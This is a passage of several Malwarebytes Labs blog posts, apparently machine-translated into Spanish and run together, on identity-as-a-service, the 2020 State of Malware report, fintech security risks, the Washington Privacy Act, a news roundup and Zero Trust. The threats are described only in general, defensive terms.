• Caro para crear y mantener.  Cuesta más si la organización admite usuarios globales debido a la complejidad de la infraestructura. Los IAM también pueden ser insostenibles en general a medida que crece el negocio. La complejidad de los costos y la infraestructura aumenta, lo que hace que los IAM sean más difíciles de soportar.
• Ineficientemente administrado, en cuanto a seguridad.  Los IAM que deben colocarse en sistemas heredados, por ejemplo, ponen en riesgo a las organizaciones porque parchar estos sistemas es un desafío, dejando la puerta abierta a las vulnerabilidades en los puntos de acceso.
• Pérdida de tiempo.  La actualización del hardware de IAM lleva mucho tiempo. A veces, la actualización no ocurre si significa largos tiempos de inactividad y pérdida de productividad. Además, los equipos de TI se enfrentan a importantes tareas que requieren mucho tiempo (y pruebas de paciencia), desde el  restablecimiento de la contraseña hasta el aprovisionamiento del usuario .
• No a prueba de futuro.  Aunque algunos IAM tradicionales pueden proporcionar soporte limitado en la nube, están diseñados esencialmente para manejar recursos locales. Dado que los IAM carecen inherentemente de soporte para la tecnología moderna (dispositivos móviles, IoT) y los disruptores comerciales (Big Data, transformación digital), no abordan lo que los usuarios actuales necesitan y quieren.

Beneficios de IDaaS

Las empresas pueden beneficiarse de IDaaS de muchas maneras. En aras de la brevedad, tenga en cuenta estos  tres impulsores principales para adaptar IDaaS : nuevas capacidades, velocidad de implementación e innovación. Esto no solo los haría más atractivos para los clientes potenciales, sino que también ayuda a retener a los clientes actuales.

Las nuevas capacidades , como el  inicio de sesión único (SSO) , brindan a los clientes comerciales la facilidad y conveniencia de acceder a múltiples recursos utilizando solo una única instancia de inicio de sesión. Iniciar sesión una vez crea un token, que el sistema IDaaS comparte con otras aplicaciones en nombre del cliente, por lo que no necesitarían seguir iniciando sesión.

SSO también elimina la carga de recordar múltiples credenciales de inicio de sesión de los usuarios, lo que generalmente los impulsa a crear contraseñas memorables pero también fáciles de descifrar. No hace falta decir que SSO, y otros protocolos como el Lenguaje de marcado de aserción de seguridad (SAML), OAuth (pronunciado  «oh-auth» ) y OpenID Connect (OIDC), mejorarán en gran medida la seguridad de una organización.

Dado que IDaaS está basado en la nube, implementarlo en su organización es mucho más rápido. Por un lado, el aprovisionamiento de hardware ya está con el proveedor IDaaS. Lo que generalmente toma un par de años para darse cuenta solo tomará varios meses, a veces incluso unas pocas semanas.

Las organizaciones que aún no están seguras de si quieren adoptar IDaaS por completo, pero tienen curiosidad por probarlo, pueden usar temporalmente la solución como un subconjunto de sus aplicaciones. Si cambian de opinión, pueden retroceder tan fácilmente como avanzaron.

Y, por último, IDaaS elimina las barreras que impiden a las organizaciones avanzar hacia la innovación . Los equipos de TI con poco personal, los costos crecientes que rodean la infraestructura de TI que solo se complican con el tiempo y el soporte insuficiente para las tecnologías modernas son solo algunos de los problemas que impiden a las empresas modernas innovar en sus propios procesos de mano de obra, ofertas de productos y marketing y ventas. técnicas

Los líderes empresariales deben «liberarse» de estos problemas al externalizar sus necesidades a un proveedor de confianza. No solo será más ligero en sus bolsillos, sino que también puede personalizar las capacidades inherentes de IDaaS para adaptarse a sus necesidades comerciales y mejorar la participación de sus clientes. Es un ganar-ganar para todos.

Sin embargo, tenga en cuenta que una implementación IDaaS pura puede no ser para todas las organizaciones. Algunas organizaciones simplemente no están listas para ello. De hecho, la mayoría de las empresas actuales utilizan entornos híbridos, una combinación de aplicaciones locales y basadas en la nube. Esto se debe a que algunas organizaciones creen que hay algunos recursos que se mantienen mejor en las instalaciones. Y cuando se trata de la adopción de IDaaS, utilizar lo mejor de ambos mundos se está convirtiendo cada vez más en la norma.

Mi organización es pequeña. ¿Sigue siendo necesario IDaaS?

Absolutamente. Las pequeñas y medianas empresas experimentan muchos de los mismos problemas de IAM que enfrentan las organizaciones empresariales. Cada empleado mantiene un conjunto de credenciales que utiliza para acceder a varias aplicaciones comerciales para hacer su trabajo. Una función de SSO en IDaaS reducirá significativamente el número de instancias de inicio de sesión que deben enfrentar al cambiar de una aplicación a otra.

Es una buena pregunta si su empresa necesita IDaaS. Pero quizás la mejor pregunta, o más importante, es si su empresa cumple con los estándares de seguridad y privacidad establecidos. Afortunadamente, tener IDaaS también ayudará con ese problema. La advertencia es que las organizaciones, independientemente de su tamaño, deben evaluar a los posibles proveedores de IDaaS en función de su madurez y su capacidad para ofrecer una gran solución. No hay dos ofertas IDaaS iguales.

Mike Wessler y Sean Brown, autores del libro electrónico  «Cloud Identity for Dummies» , proponen algunas preguntas a considerar al decidir:

• ¿Son una nueva empresa con un presupuesto ajustado para atender a los clientes de gama baja con el costo como el principal impulsor?
• ¿Son relativamente nuevos en el campo de la nube o IAM donde obtuvieron esas capacidades mediante adquisiciones recientes y simplemente están cambiando el nombre de los productos y servicios de otra persona?
• ¿Tienen experiencia y conocimientos legítimos en servicios de nube e IAM donde ofrecer IDaaS es una progresión lógica?

¿Cuáles son los posibles problemas de seguridad?

A pesar de lo bueno que IDaaS podría aportar a su organización, no es una panacea. De hecho, algunos investigadores de seguridad ya han notado preocupaciones sobre algunas de sus capacidades clave. Utilizando nuestro ejemplo anterior, que es el SSO, se argumenta que esto se ha convertido en un «punto único de falla» si falla el servidor de autenticación. O también puede actuar como un «punto de incumplimiento único», esperando ser comprometido.

El sector de seguridad cibernética tiene una lista vertiginosamente larga de casos de uso en los que las organizaciones se violan debido a credenciales comprometidas. La Red de Alerta Temprana de Australia, que se vio comprometida hace un año, fue causada por  el mal uso de las credenciales robadas . Y hay muchas formas en que las credenciales se pueden filtrar o robar. Las organizaciones pueden frustrar esto al exigir el uso de  autenticación multifactor (MFA) .

La conclusión es esta: IDaaS o no, las empresas aún tienen que adoptar y practicar hábitos informáticos seguros para minimizar su superficie de ataque.

Si desea una lectura más detallada sobre IDaaS, visite lo siguiente:

• Los 8 principales desafíos de gestión de identidad y acceso con su aplicación SaaS
• ¿Has encontrado el costo real de IDaaS?

Hoy es el Día de Internet más seguro , ¿y qué mejor manera de celebrar / rendir homenaje que sumergirse en la investigación sobre lo último en malware, exploits, PUP, amenazas web y privacidad de datos? Sucede que tenemos el contenido justo para comenzar la fiesta porque hoy publicamos los resultados de nuestro estudio anual sobre el estado del malware, el Informe del Estado del Malware 2020, y como de costumbre, es un desastre.

Desde un aumento en las amenazas centradas en la empresa hasta la diversificación de técnicas sofisticadas de piratería y sigilo, el panorama de amenazas de 2019 fue moldeado por una industria de delitos cibernéticos que tenía como objetivo mostrar que todo ha crecido y persigue a las organizaciones con mayor venganza.

El Informe del Estado del Malware 2020 presenta conjuntos de datos recopilados de telemetría de productos, macetas, inteligencia y otras investigaciones realizadas por analistas y reporteros de amenazas de Malwarebytes para investigar las principales amenazas entregadas por ciberdelincuentes a consumidores y empresas en 2019.

Nuestro análisis incluye una mirada a las amenazas para PC con Mac y Windows, Android e iOS, así como ataques basados ​​en el navegador. Además, examinamos las detecciones de consumidores y empresas sobre amenazas a regiones e industrias específicas en todo el mundo. Finalmente, analizamos el estado de la privacidad de los datos en 2019, incluida la legislación estatal y federal, así como las fallas de privacidad de algunas grandes empresas tecnológicas en yuxtaposición contra las políticas progresistas de otros .

Aquí hay una muestra de lo que encontramos:

• Las amenazas de Mac aumentaron exponencialmente en comparación con las de las PC con Windows. Si bien el volumen general de amenazas de Mac aumentó año tras año en más del 400 por ciento, ese número se ve afectado de alguna manera por una mayor base de usuarios de Malwarebytes para Mac en 2019. Sin embargo, cuando se calcula en amenazas por punto final, las Macs aún superaron a Windows en casi 2: 1)
• El volumen de amenazas globales contra los puntos finales empresariales ha aumentado en un 13 por ciento año tras año, con adware agresivo, troyanos y HackTools liderando el paquete.
• Una vez más, las organizaciones fueron golpeadas con Emotet y TrickBot , dos troyanos convertidos en botnets que aparecieron entre las cinco principales amenazas para casi todas las regiones del mundo, y en las principales detecciones para las industrias de servicios, comercio minorista y educación. Las detecciones de TrickBot en particular aumentaron más del 50 por ciento respecto al año anterior.
• La nueva actividad neta de ransomware está en su punto más alto contra las empresas, con familias como Ryuk y Sodinokibi que aumentan hasta un 543 y 820 por ciento, respectivamente.

Para obtener más información sobre las principales amenazas del año para Mac, Windows, Android y la web, así como el estado de la privacidad de los datos en el comercio y la legislación, consulte el Informe completo sobre el estado de malware de 2020 aquí .

«No tengo idea de cómo funciona esta aplicación de mi banco, y no confío en lo que no entiendo». Josh no es un viejo cascarrabias o ludita. Tiene 42 años con una comprensión decente de la tecnología. Sin embargo, los cambios en fintech han llegado demasiado rápido para él. No es que no confíe en su banco. No confía en sí mismo para usar y administrar la aplicación bancaria de forma segura.

El mundo en el que vivimos ha experimentado algunos cambios notables en la última década. Esto es ciertamente cierto para la industria bancaria, que se ha aferrado al concepto de fintech como casi intercambiable con las finanzas . Sin embargo, la tecnología financiera (o programas informáticos y otras tecnologías utilizadas para respaldar la banca y otros servicios financieros) es el sector de más rápido crecimiento en capital de riesgo. Puede abarcar desde criptomonedas hasta aplicaciones de pago móvil.

Se sentaron las bases para el surgimiento de fintech a través de una serie de incidentes importantes en los últimos 10 años. Éstos incluyen:

• La crisis bancaria y la posterior Gran Recesión de 2007–2009. Si le hubieras dicho a alguien hace 15 años que varios bancos de renombre no sobrevivirían a la década, se habrían reído de ti. Sin embargo, la lista es larga.
• Nuevas monedas introducidas en el campo de juego, especialmente las criptomonedas. Bitcoin comenzó en 2009, y desde entonces cientos de otras criptomonedas han seguido su ejemplo.
• Tasas de interés negativas. Los depósitos en efectivo incurren en un cargo por almacenamiento en un banco en lugar de ganar intereses. Algunos bancos tienen que pagar dinero para almacenar su excedente en fondos en bancos nacionales debido a las tasas de interés negativas. Algunos bancos incluso cobran a sus clientes con este interés negativo.
• Nuevos jugadores han entrado en el campo que son diferentes del establecimiento. Algunos están relacionados con el desarrollo de las criptomonedas, pero otros simplemente miran los negocios financieros de una manera nueva y única.
• Los clientes esperan cada vez más que sus pagos lleguen a su cuenta de destino el mismo día. Esto también ayuda al banco en sí, ya que reduce la cantidad que necesitan almacenar contra un interés negativo.

¿Qué es fintech?

El hardware y el software utilizados en el mundo financiero generalmente se conoce como fintech. Pero la expresión también se usa para describir las nuevas empresas en el mundo financiero. En este artículo se utilizará para describir la tecnología, ya que muchas de las instituciones financieras establecidas sienten que necesitan adaptarse a la misma tecnología nueva que las nuevas empresas ofrecen a sus clientes. Debido a esto, podemos encontrar estas nuevas características en aplicaciones bancarias y otras aplicaciones financieras tanto en las aplicaciones de firmas exitosas como en las de las nuevas finanzas.

Seguridad Fintech

Si bien puede ser menos sorprendente que las startups de Fintech estén luchando con la seguridad, a veces los nombres establecidos nos sorprenden con la facilidad con la que son víctimas de violaciones de datos, ataques de malware o aplicaciones comprometidas.

Una de las razones por las cuales algunas de las nuevas empresas fintech tienen tanto éxito radica en su capacidad para ofrecer alternativas a las soluciones financieras convencionales a través de criptomonedas, préstamos en línea y P2P. A lo largo viene una variedad de desafíos y uno de estos desafíos despierta nuestro interés: la ciberseguridad. Por nombrar un aspecto, el gran crecimiento en la cantidad y el tamaño de las plataformas en línea hace que esta industria sea muy vulnerable a las brechas de seguridad.

Algunos de los problemas

La introducción de nuevas funciones a veces parece que se hicieron rápidamente y sin tener en cuenta cuán seguras son y cuán inteligentes delincuentes podrían abusar de ellas. Por ejemplo, una aplicación de banca móvil que permitía a los usuarios agregar un teléfono adicional para controlar su cuenta simplemente escaneando un código QR terminó limpiando algunas cuentas bancarias. Los impostores inteligentes engañaron a las personas para que agregaran su teléfono dejando al impostor en control total de la cuenta.

Las solicitudes de pago que conducen a sitios web falsos son una amenaza en rápido aumento a medida que los bancos están implementando esta función. Como siempre con la tecnología más nueva, los estafadores se benefician del desconocimiento de la víctima de cómo funcionan exactamente las cosas. Alguien que pretende comprarle en un mercado en línea puede enviarle una solicitud de pago por la cantidad que espera. Todo lo que tiene que hacer es hacer clic en «Aceptar» e ingresar su pin. Y luego descubre que les pagaste en lugar de al revés.

Los sitios web de bancos falsos en general han sido un problema durante muchos años y esto probablemente seguirá siendo un problema por algún tiempo. La mayoría de las veces, estos sitios falsos están diseñados para obtener credenciales de inicio de sesión y pago de las víctimas visitantes. Y son muy difíciles de distinguir de los sitios web de bancos reales, ya que los actores de la amenaza simplemente copian todo el contenido y el diseño de los sitios originales. E instar a los clientes a buscar el candado verde ya no es un consejo útil.

Los proveedores de pagos y las tiendas en línea están plagados de skimmers web. Como hemos informado con frecuencia, especialmente hay varios grupos de Magecart que son muy activos en este frente. Los pagos son interceptados y la información de la tarjeta de pago es robada usando sitios de comercio electrónico comprometidos.

Y luego está el dinero virtual, o dado que la mayoría del dinero actual es virtual en algún nivel, hablemos de las criptomonedas en particular. Si bien la introducción de las criptomonedas tenía la intención de abrir un mundo completamente nuevo de opciones de pago, también abrió un pozo negro de opciones para ser defraudadas. La ausencia de una autoridad central dio paso a tipos de fraude y robo que no se conocían en el mundo bancario de la vieja escuela. Enormes robos de los mercados, propietarios de bancos que se ejecutan con los fondos que se les han confiado, credenciales de billetera robadas, y no olvidemos conducir por minería. Cubrimos muchos de estos crímenes en nuestro blog sobre Bankrobbers 2.0 .

Las finanzas de todo tipo han sufrido violaciones de datos en todo tipo y tamaño. Desde enormes como Equifax y Capital One hasta los igualmente dolorosos, para los involucrados, como el del banco P&N donde se derramó información confidencial de la cuenta.

Los operadores de ransomware son particularmente aficionados a las finanzas, ya que generalmente pueden permitirse pagar grandes sumas y están invertidos para que las operaciones vuelvan a funcionar rápidamente. Travelex tomó el camino y se negó a pagar la demanda de rescate realizada después de ser golpeado con Ransom.Sodinokibi .

Preocupaciones sobre la privacidad

Dado que los gobiernos solicitan la divulgación completa de los ahorros tanto en el exterior como internos, y por otro lado hacen cumplir las leyes de privacidad, se espera que las instituciones financieras equilibren estas demandas mientras mantienen a sus clientes a bordo.

Con GDPR en Europa a la vanguardia, las finanzas deben estar listas o preparadas para cumplir con GDPR o leyes similares que se aplican a ellos y a su base de clientes.

Contramedidas

La industria financiera se considera una infraestructura vital y por buenas razones. Cuando perdemos la confianza en nuestras instituciones financieras, pone a nuestra sociedad patas arriba. Cuando el papel ya no vale el número impreso en él, o no puede retirar dinero de su cuenta, eso sacude las bases de nuestra economía.

Fintech necesita adaptar un enfoque más centrado en la seguridad para desarrollar nuevas funciones, especialmente en sus aplicaciones móviles. Tampoco estaría de más proporcionarles a los clientes instrucciones detalladas sobre cómo usar de manera segura la nueva aplicación o las nuevas funciones de la aplicación.

Como startup financiera, quieres crecer rápido. Pero crecer rápido viene con sus propios problemas. Es imprescindible asegurarse de que sus medidas de seguridad puedan escalar junto con su crecimiento. A menos que desee verse restringido en su crecimiento o notar su seguridad para comenzar a agrietarse en las costuras.

Por frustrante que resulte, las finanzas deben pensar en una mejor gestión y control de la identidad. ¿Es suficiente cuando alguien inicia sesión en una cuenta para permitir que esa entidad controle completamente la cuenta? O bien, debemos agregar otro factor para acciones especiales como aumentar el monto máximo, permitir retiros al exterior, o incluso para transacciones que son más grandes de lo normal.

Las startups de Fintech no pueden esperar salirse con la suya con errores de seguridad que otras startups podrían cometer. Estar en el sector financiero conlleva diferentes responsabilidades y expectativas.

Como he escrito antes: es clave que nuestras instituciones financieras protejan nuestros dólares y nuestros datos para que podamos seguir invirtiendo nuestro dinero y nuestra confianza en ellos.

El desfile constante de la legislación de privacidad de datos de EE. UU. Continuó el mes pasado en Washington con la introducción de una ley mejorada que otorgaría a los residentes del estado los derechos de acceso, control, eliminación y transferencia de sus datos, así como la exclusión voluntaria de la venta de datos.

El proyecto de ley, llamado Washington Privacy Act , también mejora su versión anterior de 2019, brindando garantías más fuertes sobre el uso de la tecnología de reconocimiento facial. Según algunos analistas, en comparación con la ley de privacidad de datos de su vecino costero, la Ley de Privacidad del Consumidor de California, que entró en vigencia este año, la Ley de Privacidad de Washington se destaca.

El CEO de Future of Privacy Forum, Jules Polonetsky, calificó el proyecto de ley como «la legislación estatal más completa sobre privacidad propuesta hasta la fecha».

«Incluye disposiciones sobre minimización de datos, limitaciones de propósito, evaluaciones de riesgo de privacidad, requisitos contra la discriminación y límites en la creación de perfiles automatizados que otras leyes estatales no», dijo Polonetsky .

Introducida el 20 de enero por el senador estatal Reuven Carlyle, la Ley de Privacidad de Washington crearía nuevas responsabilidades para las compañías que manejan los datos del consumidor, incluida la implementación de procesos de protección de datos y el desarrollo y publicación de políticas de privacidad.

Ya, el proyecto de ley ha recibido una cálida recepción de actores corporativos y sin fines de lucro. Microsoft, el gigante tecnológico con sede en Washington, dijo que estaba alentado , y Consumer Reports acogió con beneplácito el impulso de la ley, al tiempo que instó a que se realicen aún más mejoras .

«Este nuevo borrador es definitivamente un paso en la dirección correcta hacia la protección de los datos personales de los residentes de Washington», dijo Justin Brookman, Director de Política de Privacidad y Tecnología del Consumidor de Consumer Reports. «Esperamos ver más mejoras para eliminar las lagunas inadvertidas que quedan en el texto».

Lo que haría la Ley de Privacidad de Washington

Al igual que las muchas facturas de privacidad de datos de EE. UU. Presentadas en los últimos 18 meses, la Ley de Privacidad de Washington aborda el problema de la falta de privacidad de datos con dos púas: mejores derechos para los consumidores, restricciones más estrictas para las empresas.

Del lado del consumidor, la Ley de Privacidad de Washington otorgaría varios derechos nuevos a los residentes de Washington, incluidos los derechos de acceso, corrección, eliminación y transferencia de sus datos. Además, los consumidores recibirían el derecho de «optar por no participar» en el uso de sus datos personales de múltiples maneras potencialmente invasivas. Los consumidores podrían decir que no a que se vendan sus datos y que se usen para «publicidad dirigida», la práctica algo inevitable que resulta en anuncios de un par de zapatos, un suéter atractivo o un televisor 4K que sigue a los usuarios de un dispositivo a otro. . 

Los consumidores pueden ejercer sus derechos con simples solicitudes a las empresas que manejan sus datos. Según el proyecto de ley, estas solicitudes requerirían una respuesta dentro de los 45 días. Si una empresa no puede cumplir ese plazo, puede solicitar una extensión, pero debe notificar al consumidor sobre la extensión y por qué no pudo cumplir con el plazo.

Además, las solicitudes no cumplidas no son un callejón sin salida para los consumidores: las empresas también deben ofrecer un proceso de apelación a los consumidores cuyas solicitudes niegan o no cumplen. Las solicitudes también deben ser respondidas de forma gratuita, hasta dos veces al año por consumidor.

Quizás una de las disposiciones más bienvenidas en el proyecto de ley son sus reglas contra la discriminación. Las empresas no pueden, según el proyecto de ley, tratar a los consumidores de manera diferente debido a sus opciones para ejercer sus derechos de privacidad de datos. En la superficie, eso hace que las ideas peligrosas como los esquemas de » pago por privacidad» sean mucho más difíciles de implementar.

Con respecto a las nuevas regulaciones comerciales, la Ley de Privacidad de Washington separa los tipos de compañías a las que se aplica en dos categorías: «controladores» y «procesadores». Los dos términos, tomados del Reglamento General de Protección de Datos (GDPR) de la Unión Europea , tienen significados simples. Los «controladores» son los tipos de entidades que realmente toman las decisiones sobre cómo se recopilan, comparten o utilizan los datos del consumidor. Entonces, ¿una pequeña empresa con un solo empleado que decide vender datos a terceros? Eso es un controlador. ¿Una gran empresa que decide recopilar datos para enviar anuncios dirigidos? Ese también es un controlador.

Los procesadores, por otro lado, son similares a los contratistas y subcontratistas que realizan servicios para los controladores. Entonces, ¿un procesador de pagos que simplemente procesa transacciones de comercio electrónico y nada más? Eso es un procesador.

Las nuevas reglas de la Ley de Privacidad de Washington se centran principalmente en los «controladores»: Facebook, Amazonas, Twitter, Google, Airbnbs y Oráculos del mundo.

Los controladores tendrían que publicar políticas de privacidad que sean «razonablemente accesibles, claras y significativas» e incluirían la siguiente información:

• Las categorías de datos personales procesados ​​por el controlador
• Los fines para los que se procesan las categorías de datos personales
• Cómo y dónde los consumidores pueden ejercer sus derechos
• Las categorías de terceros, si los hay, con quienes el controlador comparte datos personales

Si los controladores venden datos personales a terceros, o los procesan para publicidad dirigida, la factura requiere que esos controladores revelen claramente esa actividad, junto con instrucciones sobre cómo los consumidores pueden optar por no participar en esas actividades.

Por separado, los controladores tendrían que realizar «evaluaciones de protección de datos», en las que la empresa analiza, documenta y considera los riesgos de cualquier procesamiento de datos personales que implique publicidad dirigida, venta y «creación de perfiles».

La regulación del «perfil» es nueva en las facturas de privacidad de datos. Es admirable.

De acuerdo con el proyecto de ley, el «perfil» es cualquier forma de procesamiento automatizado de datos personales para «evaluar, analizar o predecir aspectos personales relacionados con la situación económica, salud, preferencia personal, intereses, confiabilidad, comportamiento, ubicación o ubicación de una persona identificada o identificable». movimientos «.

En la actual economía de publicidad en línea cada vez más invasiva, la elaboración de perfiles es omnipresente. Las empresas recopilan datos y crean «perfiles» de consumidores que, sí, pueden no incluir un nombre exacto, pero aún incluyen lo que se consideran predictores vitales sobre el estilo de vida y el comportamiento de ese consumidor. 

Estas nuevas regulaciones hacen que la Ley de Privacidad de Washington se destaque entre sus contemporáneos, dijo Stacey Gray, abogada principal del Foro Future of Privacy.

«El panorama general del proyecto de ley es que incluye los mismos derechos individuales que la Ley de Privacidad del Consumidor de California (de acceso, venta, etc.) y más», dijo Gray. «El derecho a corregir sus datos, a optar por no recibir publicidad dirigida y por la creación de perfiles, eso está más allá del lado de los derechos individuales».

Gray agregó que las obligaciones comerciales del proyecto de ley también van más allá de las de la CCPA, nombrando las evaluaciones de riesgo de datos discutidas anteriormente.

La Ley de Privacidad de Washington incluye varias obligaciones comerciales más, que se suman a protecciones significativas de datos para los consumidores. Por ejemplo, las empresas tendrían que comprometerse con los principios de minimización de datos, solo recolectando los datos personales de los consumidores que sean necesarios para fines expresos. Las compañías también necesitarían obtener el consentimiento afirmativo y de aceptación de los consumidores antes de procesar cualquier «información confidencial», que es cualquier información que pueda revelar enfermedades o diagnósticos de raza, etnia, religión, salud mental o física, orientaciones sexuales o ciudadanía e inmigración. estados.

Pero quizás lo más intrigante en la Ley de Privacidad de Washington es su regulación de la tecnología de reconocimiento facial.

Disposiciones de reconocimiento facial.

En 2019, los legisladores del estado de Washington elaboraron un proyecto de ley destinado a mejorar las protecciones de privacidad de los datos de los consumidores. Lo llamaron … la Ley de Privacidad de Washington. Ese proyecto de ley original , que ahora ha sido sustituido por la versión 2020, incluía disposiciones sobre el uso comercial del reconocimiento facial.

A primera vista, las nuevas reglas se veían bien: las empresas que usaban tecnología de reconocimiento facial para fines comerciales tendrían que obtener el consentimiento de los consumidores «antes de implementar los servicios de reconocimiento facial».

Desafortunadamente, la siguiente oración del proyecto de ley original hizo que ese consentimiento casi no tuviera sentido.

Según ese proyecto de ley, el «consentimiento» del consumidor podría obtenerse no preguntándole al consumidor si acordó que se registraran sus datos faciales, sino publicando un letrero en las instalaciones de la empresa.

Como decía el proyecto de ley:

“La colocación de un aviso visible en un local físico o en línea que transmita claramente que los servicios de reconocimiento facial se están utilizando constituye el consentimiento del consumidor para usar dichos servicios de reconocimiento facial cuando ese consumidor ingresa a esos locales o procede a usar los servicios en línea que tienen dicho aviso , siempre que exista un medio por el cual el consumidor pueda elegir entre los servicios de reconocimiento facial «.

La longitud del explicador es tan amplia como la excepción que permite.

Esta escapatoria molestó a varios defensores de los derechos de privacidad que, en febrero de 2019, enviaron una carta a los legisladores clave de Washington.

«[Aunque] el proyecto de ley supuestamente requiere el consentimiento del consumidor para el uso de la tecnología de reconocimiento facial, en realidad permite a las empresas sustituir la notificación para solicitar el consentimiento, dejando a los consumidores sin una oportunidad real de ejercer la elección o el control», dice la carta . Fue firmado por Consumer Reports, Common Sense, Electronic Frontier Foundation y Privacy Rights Clearinghouse.

El proyecto de ley 2020 cierra este vacío legal, en su lugar requiere un consentimiento afirmativo y de aceptación para el uso de reconocimiento facial comercial, junto con notificaciones obligatorias, como letreros, en espacios que usan tecnología de reconocimiento facial. El nuevo proyecto de ley también requiere que los procesadores abran sus herramientas de procesamiento de datos a investigaciones y pruebas externas, en un esfuerzo por erradicar lo que el proyecto de ley llama «diferencias de rendimiento injustas en subpoblaciones distintas», como minorías, personas discapacitadas y ancianos.

Avanzando la Ley de Privacidad de Washington

A pesar de que la Ley de Privacidad de Washington de 2019 obtuvo una rápida aprobación en el Senado dos meses después de su presentación en enero, el proyecto de ley finalmente no llegó a la Cámara. Múltiples factores llevaron al fracaso del proyecto de ley, incluidas las definiciones del proyecto de ley para ciertos términos, su enfoque para la aplicación y su tratamiento del reconocimiento facial.

Gray dijo que algunos de esos mismos obstáculos podrían surgir para el proyecto de ley 2020.

«Si este proyecto de ley no se aprueba este año, es allí donde podríamos ver una fuente de conflicto, ya sea con las disposiciones de reconocimiento facial o con la aplicación», dijo Gray. Para que se imponga la ejecución, Gray dijo que la oficina del Fiscal General, encargada de la regulación, necesitará una mayor financiación y personal. Además, es probable que haya oposición a la falta de «derecho de acción privado» del proyecto de ley, lo que significa que los consumidores no podrán presentar demandas individuales contra las compañías que, según alegan, violaron la ley. Este problema ha sido un punto de conflicto para la legislación de privacidad de datos durante años .

Aún así, dijo Gray, el proyecto de ley muestra una mejora con respecto a su versión 2019, lo que podría ayudar a impulsarlo.

«Aparte de todo», dijo Gray, «somos más optimistas que el año pasado sobre su aprobación».

La semana pasada en Malwarebytes Labs, analizamos las fortalezas y debilidades del modelo Zero Trust , le brindamos información sobre el phishing de lanza y profundizamos en el mundo de la seguridad del proveedor de servicios administrados (MSP) .

Otras noticias de ciberseguridad

• ONU comprometida a través del truco de Sharepoint: una historia extraordinaria que destaca que absolutamente nadie está a salvo cuando suceden cosas malas y luego se cubren . (Fuente: The Register)
• TA505 regresa: un conocido ataque de phishing financiero ha regresado de una pausa para causar caos una vez más. (Fuente: Bleeping Computer)
• SMS phishing, también conocido como smishing: se advierte a los residentes del condado de Pitt que tengan cuidado con las falsas notificaciones de FedEx enviadas por mensaje de texto. (Fuente: Canal de noticias 12)
• El refuerzo de las redes sociales se encuentra con el caos de contraseñas: otra organización descubre demasiado tarde que las contraseñas de texto sin formato no son una gran idea . (Fuente: TechCrunch)
• La violación de Ashley Madison vuelve a perseguirnos: cinco años después, está causando problemas en todas las formas nuevas, alimentando una nueva estafa de extorsión . (Fuente: VadeSecure)
• Hackear en Hong Kong: ESET analiza cómo el grupo Winnti apunta a dos universidades de Hong Kong . (Fuente: ESET)
• Microsoft lanza un nuevo programa de recompensas de errores: si te gustan los juegos, esto puede ser justo lo que estás buscando . (Fuente: Ayuda Net Security)
• Gran incumplimiento, grandes números: un compromiso podría incluir una gran cantidad de información de tarjeta de crédito (más de 30 millones) . (Fuente: Krebs sobre seguridad)
• Han llegado los estafadores de virus del mundo real: los documentos de Word atrapados por explosivos que empujan el troyano Emotet están siendo enviados a los buzones de las personas, disfrazados de advertencias sobre el coronavirus. (Fuente: TechRepublic)
• Phishing complicado: puede ser el caso de que no seamos tan buenos para detectar estafas como creemos que somos. (Fuente: ZDNet)

En un tribunal de justicia de los Estados Unidos, los acusados ​​se consideran inocentes hasta que se pruebe su culpabilidad. En un modelo de seguridad Zero Trust, lo contrario es cierto. Todo y todos deben considerarse sospechosos (cuestionados, investigados y verificados) hasta que podamos estar absolutamente seguros de que es seguro permitirse.

Zero Trust es un concepto creado por John Kindervag en 2010 durante su tiempo como vicepresidente y analista principal de Forrester Research . Al observar las fallas dentro de las organizaciones para detener los ataques cibernéticos, especialmente los movimientos laterales de amenazas dentro de sus redes, Kindervag se dio cuenta de que el modelo de seguridad tradicional operaba con el supuesto anticuado de que todo lo que se encuentra dentro de la red de una organización podía ser confiable. En cambio, Zero Trust invierte ese modelo, dirigiendo a los equipos de TI de acuerdo con el principio rector de «nunca confiar, siempre verifique» y redefiniendo el perímetro para incluir usuarios y datos dentro de la red.

En los últimos 10 años, más y más empresas se han movido hacia el modelo Zero Trust, demoliendo la vieja mentalidad de castillo y foso y aceptando la realidad de las amenazas internas . Echamos un vistazo a Zero Trust, incluidas sus fortalezas y debilidades, para ayudar a las organizaciones a evaluar si deben adoptar la filosofía dentro de sus propios muros o considerar diferentes métodos.

Definición de confianza cero

Zero Trust es un marco de seguridad de la información que establece que las organizaciones no deben confiar en ninguna entidad dentro o fuera del perímetro de su red en ningún momento. Proporciona la visibilidad y los controles de TI necesarios para asegurar, administrar y monitorear cada dispositivo, usuario, aplicación y red que pertenece o es utilizada por la organización y sus empleados y contratistas para acceder a los datos comerciales.

El objetivo de una configuración de confianza cero debe ser claro: restringir el acceso a datos confidenciales, aplicaciones y dispositivos según sea necesario. Los empleados en finanzas necesitan software de contabilidad; todos los demás deben estar excluidos. Los trabajadores remotos deberían usar VPN; debería prohibirse el acceso desde Internet abierto. El intercambio de datos debe ser limitado y controlado. El flujo libre de información que alguna vez fue una de las piedras angulares de Internet debe limitarse para proteger las redes de la penetración, los clientes de las violaciones de privacidad y las organizaciones de los ataques a la infraestructura y las operaciones.

La estrategia en torno a Zero Trust se reduce a examinar cualquier tráfico entrante o saliente. Pero la diferencia entre este y otros modelos de seguridad es que incluso el tráfico interno, es decir, el tráfico que no cruza el perímetro de la organización, también debe tratarse como un peligro potencial.

Si bien esto puede parecer grave, considere los cambios en el panorama de amenazas en los últimos 10 años : los cientos de filtraciones e infracciones de datos públicos; ataques de ransomware que detuvieron las operaciones en miles de puntos finales en ciudades, escuelas y organizaciones de atención médica; o millones de información de identificación personal de usuarios robada de bases de datos comerciales. A medida que los delincuentes cibernéticos continúan centrando su atención en los objetivos comerciales en 2020, Zero Trust parece un enfoque inteligente para frustrar un número creciente de ataques.

Implementando Zero Trust

Implementar un modelo de seguridad Zero Trust en una organización no es simplemente un cambio de mentalidad. Se requerirá una visión clara de las funciones dentro de los departamentos de la compañía, el software implementado actualmente, los niveles de acceso y los dispositivos, y cómo se verá cada uno de esos requisitos en el futuro.

A menudo, construir una red Zero Trust desde cero es más fácil que reorganizar una red existente en Zero Trust porque la red existente deberá permanecer funcional durante todo el período de transición. En ambos escenarios, los equipos de TI y seguridad deben idear una estrategia acordada que incluya la infraestructura final ideal y una estrategia paso a paso sobre cómo llegar allí.

